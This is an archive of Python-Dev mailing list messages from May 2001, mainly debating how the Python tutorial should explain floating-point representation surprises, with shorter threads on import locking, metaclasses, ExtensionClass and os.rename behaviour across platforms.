I can't check right now, but I thought that this was pretty consistent
across some common platforms?

> I can certainly explain that this is so, and even why, but unsure
> the tutorial is the right place for it.  In any case the tutorial
> shouldn't be giving examples whose output is platform-dependent.
> For example, don't use 10 * 3.14, use 10 * 3.25.  Want me to scour
> the tutorial for all such cases?

Are you serious?

This is something that the newbie wou is in the least bit adventurous
will run into anyway, so I don't think that not talking about this at
all in the tutorial is fair or helpful.  That just perpetuates the
questions from newbies about "floating point is broken" -- since none
of the tutorial examples prepare them for this.

Since this is behavior that is ordinarily observed and perpetually
perplexing, I think it *must* be treated in the tutorial.  The
tutorial doesn't have to have the full explanation -- maybe it's
enough to say something like ``due to round-off errors you will
sometimes see inexact results like 31.400000000000002; don't worry
about this, you can use str() or "%g" (but not round()!) to strip
redundant precision, and here's a URL for more info.''

Or maybe the full story can be an appendix.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz at rahul.net  Mon May 21 22:09:04 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:09:04 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM
Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
> Or maybe the full story can be an appendix.

Or maybe Decimal should go in the standard distribution?  What kind of
deadline do I have for finishing that to go into 2.2?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido at digicool.com  Mon May 21 22:35:10 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:35:10 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT."
             <20010521200904.05CAE99C81@waltz.rahul.net> 
References: <20010521200904.05CAE99C81@waltz.rahul.net> 
Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com>

> > Or maybe the full story can be an appendix.
> 
> Or maybe Decimal should go in the standard distribution?  What kind of
> deadline do I have for finishing that to go into 2.2?

Adding Decimal to the distribution is fine.  But using it by default
for floating point literals and other floating point results is a
different story.  The PEP about that hasn't really been discussed
enough to make a decision, but a conservative estimate is that this
change won't be made in 2.2.  So Decimal doesn't solve the problem the
tutorial has.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz at rahul.net  Mon May 21 22:42:15 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:42:15 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM
Message-ID: <20010521204215.F216699C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
>>> Or maybe the full story can be an appendix.
>> 
>> Or maybe Decimal should go in the standard distribution?  What kind of
>> deadline do I have for finishing that to go into 2.2?
> 
> Adding Decimal to the distribution is fine.  But using it by default
> for floating point literals and other floating point results is a
> different story.  The PEP about that hasn't really been discussed
> enough to make a decision, but a conservative estimate is that this
> change won't be made in 2.2.  So Decimal doesn't solve the problem the
> tutorial has.

Wasn't thinking of going quite that far, only changing the tutorial to
say something like, "If you want speed, use the hardware FP (which is
directly supported by Python's floating literals); if you want accuracy,
use Decimal."  (Or FixedPoint, which is already in the distribution.)
The full story needn't go in the Appendix; we can simply refer people to
Cowlishaw and Kahan.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido at digicool.com  Mon May 21 22:57:08 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:57:08 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT."
             <20010521204215.F216699C81@waltz.rahul.net> 
References: <20010521204215.F216699C81@waltz.rahul.net> 
Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com>

[Aahz]
> >>> Or maybe the full story can be an appendix.
> >> 
> >> Or maybe Decimal should go in the standard distribution?  What kind of
> >> deadline do I have for finishing that to go into 2.2?

[Guido]
> > Adding Decimal to the distribution is fine.  But using it by default
> > for floating point literals and other floating point results is a
> > different story.  The PEP about that hasn't really been discussed
> > enough to make a decision, but a conservative estimate is that this
> > change won't be made in 2.2.  So Decimal doesn't solve the problem the
> > tutorial has.

[Aahz]
> Wasn't thinking of going quite that far, only changing the tutorial to
> say something like, "If you want speed, use the hardware FP (which is
> directly supported by Python's floating literals); if you want accuracy,
> use Decimal."  (Or FixedPoint, which is already in the distribution.)
> The full story needn't go in the Appendix; we can simply refer people to
> Cowlishaw and Kahan.

I think that most people don't care about either speed or accuracy,
but (being Python users) everybody cares about convenience, and
convenience is using the built-in floating point literals.  (Also,
most other modules returning or using floating point numbers use
binary floating point, e.g. the time module and of course the math
module.)

As long as the built-in literals are binary floating point, they are
what 99% of the code uses, so we need to explain the pitfalls.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake at cj42289-a.reston1.va.home.com  Mon May 21 23:47:35 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Mon, 21 May 2001 17:47:35 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental updates to the Python 2.2 documentation.


From tim at digicool.com  Mon May 21 23:57:22 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 21 May 2001 17:57:22 -0400
Subject: [Python-Dev] FP vs. tutorial
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>

Let's get some errors cleared up first:

+ FixedPoint is not in the distribution.

+ There is no PEP for Decimal.

+ Decimal f.p. is not more accurate than binary f.p.  In fact, it's
  provably worse (but not by much).

For the rest,

+ Yes, I'm serious about not including tutorial examples with
  platform-dependent output, unless they're explicitly meant to
  illustrate non-portable code.

+ Specific small examples notwithstanding, there is no uniformity
  across platforms in the last digit or so, because not even the IEEE-
  754 standard requires that (while C is much sloppier than 754), and
  vendors generally don't implement anything better than the minimum
  necessary when it comes to f.p. (Sun is a notable exception).

+ Happy to add text explaining the existence of surprises, and
  providing a URL.  Do the floating-point morons <wink> on Python-Dev
  find this one comprehensible?:

    http://www.lahey.com/float.htm


From guido at digicool.com  Tue May 22 00:33:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 18:33:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT."
             <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com> 
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com> 
Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com>

> + Yes, I'm serious about not including tutorial examples with
>   platform-dependent output, unless they're explicitly meant to
>   illustrate non-portable code.

Sure.  Most examples can be rewritten to avoid platform-dependent
output.  But there should be one section on floating-point
inaccuracies that shows a few of the kind of things you can expect on
a typical platform, and 1.1 -> 1.1000000000000001 is pretty common.

> + Specific small examples notwithstanding, there is no uniformity
>   across platforms in the last digit or so, because not even the IEEE-
>   754 standard requires that (while C is much sloppier than 754), and
>   vendors generally don't implement anything better than the minimum
>   necessary when it comes to f.p. (Sun is a notable exception).

So we'll have to add something like "the actual inexact output you see
may differ from the inexact output in this example".

> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I was thinking more of immortalizing this one:

http://www.python.org/cgi-bin/moinmoin/RepresentationError

This can serve as a nice self-contained section on f.p. surprises.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From MarkH at ActiveState.com  Tue May 22 01:06:39 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:06:39 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>

> > + Happy to add text explaining the existence of surprises, and
> >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> >   find this one comprehensible?:

Hey - I resemble that remark!

> >     http://www.lahey.com/float.htm

I quite liked the tone of this note.  The Python-dev morons probably could
make good sense of this, but only due to the relentless persistence of a
certain timbot.

If not for Tim, I would have forgotten completely about binary floating
point versus decimal floating point.  IIRC, me and about 40 other guys were
desperately trying to get the attention of the single CS female on the day
that lecture was given.  (Actually, that is a pretty safe bet - _all_
lectures were spent that way :)

However, without a little additional background I doubt the masses would be
able to get too far into this.

As Tim has said a few times, most people wont care - they just want it to
work!

> I was thinking more of immortalizing this one:
>
> http://www.python.org/cgi-bin/moinmoin/RepresentationError

IMO, this is a little worse.  There is less "background".  Eg, in almost the
first paragraph we see:

"""
Rewriting
    1        J
   ---  ~= ----
   10      2**N
"""

And I went "huh?  Where did j and N spring from?".  Reading a bit further
made it clear, but this document did seem a little impenetrable to floating
point or maths newbies.

It seems to me that the RepresentationError document was written for people
with a decent background in maths - exactly the sort of people who _don't_
need such a document.

Just-my-0.020000002-cents-worth ly,

Mark.


From jeremy at digicool.com  Tue May 22 01:13:09 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Mon, 21 May 2001 19:13:09 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
References: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <15113.41221.839653.822246@slothrop.digicool.com>

We looked at the SecondImport test case today.  It's a good test case
for programs that execute "import os" in a time-critical inner loop
:-).

The primary reason it is slower is the import lock that was added
after 1.5.2.  The benchmark, run in isolation, spends about 6 percent
of its time in the locking code.  Since it only spends about 20
percent of its time actually doing imports, this is a pretty
substantial cost.

It seems possible to eliminate some of the cost by using a special
marker in sys.modules that means: "This is not a module, but it's
being loaded by another thread."  But Guido doesn't sound interested
in optimizing programs with imports in inner loops.

Jeremy


From tim at digicool.com  Tue May 22 01:20:16 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 21 May 2001 19:20:16 -0400
Subject: [Python-Dev] test_mailbox now fails on Windows
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJGCAAA.tim@digicool.com>

Appears to be because new code uses os.link, which doesn't exist on Windows.

BTW, test_urllib2.py is still failing on Windows (and has been for a couple
of weeks).


From michel at digicool.com  Tue May 22 01:42:49 2001
From: michel at digicool.com (Michel Pelletier)
Date: Mon, 21 May 2001 16:42:49 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>

On Tue, 22 May 2001, Mark Hammond wrote:

> > > + Happy to add text explaining the existence of surprises, and
> > >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> > >   find this one comprehensible?:
> 
> Hey - I resemble that remark!

As they say in the south, "mah-self"

> > >     http://www.lahey.com/float.htm
> 
> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.

I liked the tone too, but it really goes into a lot of detail, there's
this problem, and that one, oh and also *this* one and then there's *that*
and the other thing, and after a while you get the impression that
floating-point is for the insane.

> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys were
> desperately trying to get the attention of the single CS female on the day
> that lecture was given.  (Actually, that is a pretty safe bet - _all_
> lectures were spent that way :)

<sidetrack> 
The funny thing about that is we were in *Long Beach* (I
assume you mean IPC9), if you wanted to see beautiful, scarcely clothed
women in an acceptable public venue you woudn't have had to go far, and
they would have probably had more interesting "significant bits" (it's
none of anyones business where *I* was during the lectures ;).

Someone on the Zope list proposed P4W (Python for Women).  Poor, desperate
souls.  Obviously, P4E includes them too!!
</sidetrack>

> > I was thinking more of immortalizing this one:
> >
> > http://www.python.org/cgi-bin/moinmoin/RepresentationError
> 
> IMO, this is a little worse.

I agree.  Equations should not be needed to explain this.

-Michel


From MarkH at ActiveState.com  Tue May 22 01:47:06 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:47:06 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEIMDNAA.MarkH@ActiveState.com>

> <sidetrack>
> The funny thing about that is we were in *Long Beach* (I
> assume you mean IPC9), if you wanted to see beautiful, scarcely clothed

Actually, I meant the computer science lectures all those years ago.
Literally one female.

And-not-much-has-changed ly,

Mark.


From guido at digicool.com  Tue May 22 05:22:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:22:40 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000."
             <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com> 
References: <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com> 
Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com>

Hi Alan,

Thanks a lot for your input.  I am cc'ing this reply to python-dev
because I think my reply will be interesting for others.
(Python-dev'ers: Alan expressed concern that introducing Smalltalk
metaclasses would make Python unnecessarily complicated.)


The way my thinking is currently going, it's not likely that Python
will get a metaclass system similar to Smalltalk.  However, unifying
types and classes is useful for other reasons: please go to
http://python.sourceforge.net/peps/ to read PEP 252 which explains how
introspection can become simpler and more powerful by unifying the
introspection mechanisms for types and classes.

There will still be metaclasses, but the metaclasses will be less
important than in Smalltalk.  Class methods as commonly seen in
Smalltalk are not high on my priority list, and the metaclass
hierarchy won't be parallelling the regular class hierarchy.  Instead,
most metaclass programming will be done in C by programmers who want
to implement alternative class policies.

For example, the current class implementation gives each class a
__dict__ for methods and class variables, and dynamically searches the
class hierarchy for methods.  An alternative inheritance policy could
merge the __dict__ of the base class(es) with the __dict__ of the
derived class at class declaration time: this would make method lookup
a single dict lookup no matter how many levels of base classes are
involved, at the cost of making classes less dynamic, because a change
to a base class won't be seen in a derived class.  A metaclass
controls method lookup and class construction, and thus a different
metaclass can be used to change this policy for selected class
hierarchies without changing the default policy (which would be
backwards incompatible).

Other policies under control of a metaclass could include overriding
hooks for getattr and setattr, alternative mechanisms to store
instance variables (e.g. slot-based rather than dict-based), and so
on.

While I think I can make it possible to write metaclasses in pure
Python (by subclassing types.TypeType), I expect that most
metaprogramming will be done in C, for performance reasons and for
maximum flexibility.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Tue May 22 05:55:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:55:26 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT."
             <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com> 
Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com>

> [Guido]
> > I would like to break this down by defining the mapping between cmp()
> > and rich comparisons.

[Tim]
> Good idea!

Followed by many nitpicking questions about what I meant.  As a matter
of process, I think it's better to try to channel instead of challenge
me.  I just don't seem to have the concentration necessary to come up
with all the details needed to make this worthy of a language
definition, and you do.

If you want a BDFL proclamation on currently gray areas in the rules,
or a reversal of what the current implementation does in some cases,
please draft a definition with a few leading questions.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Tue May 22 06:02:18 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 22 May 2001 00:02:18 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKGKDAA.tim.one@home.com>

[Mark Hammond, on http://www.lahey.com/float.htm]

> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.
>
> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys
> were desperately trying to get the attention of the single CS female on
> the day that lecture was given.  (Actually, that is a pretty safe bet -
> _all_ lectures were spent that way :)

I remember guys like you.  Well guess what?  You ended up with a baby, while
I'm known on two continents as the author of tabnanny.py.  Ha!  Revenge is a
dish best eaten cold <burp>.

> However, without a little additional background I doubt the masses would
> be able to get too far into this.

There's only so much you can say to unmotivated people who are also unwilling
to learn.  That's not my problem.  Finding them a gentle intro from which
they *could* learn isn't either, but typing a URL is easy enough that I don't
mind.

Here:  I want to script MS Word with Python.  I don't know COM and refuse to
learn anything about it.  I'd rather not install win32all either, and import
statements confuse me.  Why don't you make it easy for me?  It's the same
thing -- you can point them at what they need to learn if they're serious,
else they're simply out of luck.

[And on]
>> http://www.python.org/cgi-bin/moinmoin/RepresentationError
>
> IMO, this is a little worse.

In one sense it's much worse:  it's only trying to explain a single cause of
fp surprises.  OTOH, it explains it precisely while giving the reader the
tools needed to do an exact analysis of any case of that particular class.
The Lahey link touches on all the common sources of surprises, but leaves
them fuzzy.

> There is less "background".  Eg, in almost the first paragraph we see:
>
> """
> Rewriting
>     1        J
>    ---  ~= ----
>    10      2**N
> """
>
> And I went "huh?  Where did j and N spring from?".  Reading a bit further
> made it clear, but this document did seem a little impenetrable to
> floating point or maths newbies.

It did its job for them if it simply scared them <0.5 wink>.

> It seems to me that the RepresentationError document was written for
> people with a decent background in maths -

There's nothing more complicated than integer division there.

> exactly the sort of people who _don't_ need such a document.

They actually do:  regardless of math background, nothing about f.p. is
obvious before studying f.p. as a subject in its own right.  It's "not like"
anything else, and in previous lives I spent a good chunk of my work time
explaining the same stuff to doctorates.  Mathematicians were actually the
hardest audience at first, perhaps because they had the hardest time
admitting they didn't already understand it; after getting beyond bruised
professional pride, though, they were the easiest audience to bring up to
speed.


From tim at digicool.com  Tue May 22 06:58:21 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 22 May 2001 00:58:21 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>

[Michel Pelletier, on http://www.lahey.com/float.htm]
> I liked the tone too, but it really goes into a lot of detail, there's
> this problem, and that one, oh and also *this* one and then there's
> *that* and the other thing, and after a while you get the impression
> that floating-point is for the insane.

Using an unfamiliar power tool with sharp edges, and while blindfolded, is
insane.

[and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]

> I agree.  Equations should not be needed to explain this.

There's exactly one equation on that page, saying that one ratio of two
integers is approximately equal to another ratio of two integers.  If that's
too much for you, and you weren't satisfied with the *initial* hand-wavy
explanation ("1/10 is not exactly representable as a binary fraction")
either, then it's up to you to do better than the latter without actually
saying anything useful <wink>:

Q:  Why is Python broken:

    >>> 0.1
    0.10000000000000001

A:  [your turn]


From gward at python.net  Tue May 22 15:41:57 2001
From: gward at python.net (Greg Ward)
Date: Tue, 22 May 2001 09:41:57 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
Message-ID: <20010522094157.A1245@gerg.ca>

On 21 May 2001, Tim Peters said:
> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I found this article more useful, interesting, and informative than
whatever I learned about binary floating-point in my academic years.
Good link, Tim.  Two catches:

  * I can just barely follow the FORTRAN examples; I very much doubt
    the average Python newbie would have any more luck than me

  * I tried several of the FORTRAN examples in Python, and did not
    witness any of the gotchas they are meant to illustrate.  Possibly
    it's just single-precision vs. double-precision difference, but
    Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
    doesn't demonstrate the same gotchas as that article does.

        Greg
-- 
Greg Ward - geek                                        gward at python.net
http://starship.python.net/~gward/
Ban the bomb -- save the world for conventional warfare.


From skip at pobox.com  Tue May 22 18:01:40 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 22 May 2001 11:01:40 -0500
Subject: [Python-Dev] type/class unification and ExtensionClass
Message-ID: <15114.36196.4677.99240@beluga.mojam.com>

I know Guido has recently been working on some of the type/class unification
issues (PEPs 252 and 253).  Will this affect ExtensionClass?  In particular,
will it go away or have to be reworked significantly for Python 2.2 or 2.3?
The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
hard it would be to move away from ExtensionClass for these wrappers.  My
reading of PEP 253 suggests this shouldn't be too difficult.

I'd ask Guido directly, but I figure other people on this list might also
have useful input on the issue and/or be able to answer, saving him the
time.  At any rate, he will see it posted here just the same.

Thx,

Skip


From guido at digicool.com  Tue May 22 18:23:52 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 12:23:52 -0400
Subject: [Python-Dev] type/class unification and ExtensionClass
In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT."
             <15114.36196.4677.99240@beluga.mojam.com> 
References: <15114.36196.4677.99240@beluga.mojam.com> 
Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com>

> I know Guido has recently been working on some of the type/class unification
> issues (PEPs 252 and 253).

And I'm not done yet. :-)

> Will this affect ExtensionClass?  In particular,
> will it go away or have to be reworked significantly for Python 2.2 or 2.3?

Probably.  Jim Fulton in particular asked me to work on this because
he wants to phase out ExtensionClass.

> The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
> hard it would be to move away from ExtensionClass for these wrappers.  My
> reading of PEP 253 suggests this shouldn't be too difficult.

I don't think so either.

> I'd ask Guido directly, but I figure other people on this list might also
> have useful input on the issue and/or be able to answer, saving him the
> time.  At any rate, he will see it posted here just the same.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel at digicool.com  Tue May 22 23:44:09 2001
From: michel at digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 14:44:09 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
Message-ID: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>

On Tue, 22 May 2001, Tim Peters wrote:

> [Michel Pelletier, on http://www.lahey.com/float.htm]
> > I liked the tone too, but it really goes into a lot of detail, there's
> > this problem, and that one, oh and also *this* one and then there's
> > *that* and the other thing, and after a while you get the impression
> > that floating-point is for the insane.
> 
> Using an unfamiliar power tool with sharp edges, and while blindfolded, is
> insane.

I should have been more clear, I liked the first couple of paragraphs for
their descriptions, and there is certainly nothing wrong with the document
as it stands, but such an explanation would be a bit too lengthly and
boring to a typical fifth grader or photoshop guru going through the
Tutorial and dabbling in programming for the very first time.

> [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]
> 
> > I agree.  Equations should not be needed to explain this.
> 
> There's exactly one equation on that page, saying that one ratio of two
> integers is approximately equal to another ratio of two integers.

Who was it that said every equation will halve your audience?  I agree
with that, the tutorial should try to be as broad and simple as possible.

> If that's
> too much for you, and you weren't satisfied with the *initial* hand-wavy
> explanation ("1/10 is not exactly representable as a binary fraction")
> either, then it's up to you to do better than the latter without actually
> saying anything useful <wink>:

The latter is fine, although I think the first document hand-waves better.  

-Michel


From skip at pobox.com  Tue May 22 23:54:42 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 22 May 2001 16:54:42 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
Message-ID: <15114.57378.887742.531145@beluga.mojam.com>

Couldn't figure out why this message never generated any comment.  Turns out
it didn't reach the list because the host I sent it from
(dynamic4.tttech.com) couldn't be resolved.  I just noticed it in my errors
mailbox and am sending it out again.

------------------------------------------------------------------------------
It was brought to my attention a week ago by a client that os.rename
semantics differ between Unix and Windows.  On Unix, if the destination file
already exists it is silently deleted.  On Windows, an exception is raised.
I was able to verify this for Python 2.0 on Windows98.  I assume nothing
changed for 2.1, but I can't verify that.  (Windows trashed my partition
table and my Linux root partition while I was downloading 2.1.
Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
checked the Mac yet (will do that when I get back to the US), but I think
that os.rename should have the same semantics across all platforms.  To the
extent reasonably possible, I think this should also be true of other common
functions exposed through the os module.

On the (unsupportable) theory that to-date, more Python apps have been
written and/or deployed on Unix-like systems and that where Windows apps are
concerned, many developers will have added a thin wrapper to mimic the Unix
semantics, I think less breakage would result if the Unix semantics were
implemented in the Windows version.  It appears that is what POSIX
compliance would demand as well.

Skip


From fdrake at acm.org  Tue May 22 23:55:29 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 17:55:29 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
References: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
	<Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com>

Michel Pelletier writes:
 > as it stands, but such an explanation would be a bit too lengthly and
 > boring to a typical fifth grader or photoshop guru going through the
 > Tutorial and dabbling in programming for the very first time.

  But that's not the audience the Python Tutorial is targetted to --
readers are expected to be essentially competant in at least one "3rd
generation" language.  Maybe a few will shy away from a simple
equation, but not so many.  Those who do would do well to shy away
from FP as well.  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Wed May 23 00:04:11 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 18:04:11 -0400 (EDT)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com>
References: <15114.57378.887742.531145@beluga.mojam.com>
Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>

skip at pobox.com writes:
 > On the (unsupportable) theory that to-date, more Python apps have been
 > written and/or deployed on Unix-like systems and that where Windows apps are
 > concerned, many developers will have added a thin wrapper to mimic the Unix
 > semantics, I think less breakage would result if the Unix semantics were

  I don't know whether there are more deployed Python apps on Unix
than on Windows (and I've no good idea about how to find out), but I
think unifying the semantics one way or the other is a good thing.
Regardless of which set of semantics is chosen.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh at python.net  Wed May 23 00:07:12 2001
From: mwh at python.net (Michael Hudson)
Date: 22 May 2001 23:07:12 +0100
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)"
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>

Michel Pelletier <michel at digicool.com> writes:

> Who was it that said every equation will halve your audience?

It was Stephen Hawking's editor when he was preparing A Brief History
Of Time (or at least, it gets mentioned in the preface; the advice may
be older).

Cheers,
M.

-- 
7. It is easier to write an incorrect program than understand a
   correct one.
  -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html


From jeremy at digicool.com  Wed May 23 00:57:40 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 22 May 2001 18:57:40 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
	<m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15114.61156.692322.674137@slothrop.digicool.com>

>>>>> "MWH" == Michael Hudson <mwh at python.net> writes:

  MWH> Michel Pelletier <michel at digicool.com> writes:
  >> Who was it that said every equation will halve your audience?

  MWH> It was Stephen Hawking's editor when he was preparing A Brief
  MWH> History Of Time (or at least, it gets mentioned in the preface;
  MWH> the advice may be older).

There's a similar saw about excerpts of books in foreign languages.  I
believe I first read it in reference to Umberto Eco's Foucault's
Pendulum, which starts with a full page of Hebrew.

Jeremy


From chrishbarker at home.net  Wed May 23 01:21:01 2001
From: chrishbarker at home.net (Chris Barker)
Date: Tue, 22 May 2001 16:21:01 -0700
Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line   
 conversion?
References: <20010414192445-r01010600-f8273ce6@213.84.27.177>
Message-ID: <3B0AF45D.732126E6@home.net>

Just van Rossum wrote:

> Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't
> seem to help focussing on actual content...
> 
> Just

Just (or anyone else)

Have you made any progress on this PEP? I'd like to see it happen, so if
you havn't done it, I'll try to find the time to make a start on it
myself.

I have written a simple class that impliments a line-ending-neutral text
file class. I wrote it because I have a need for it, and I thought it
would be a reasonable prototype for any syntax and methods we might want
to use in an actual implimentation. I doubt anyone would find the
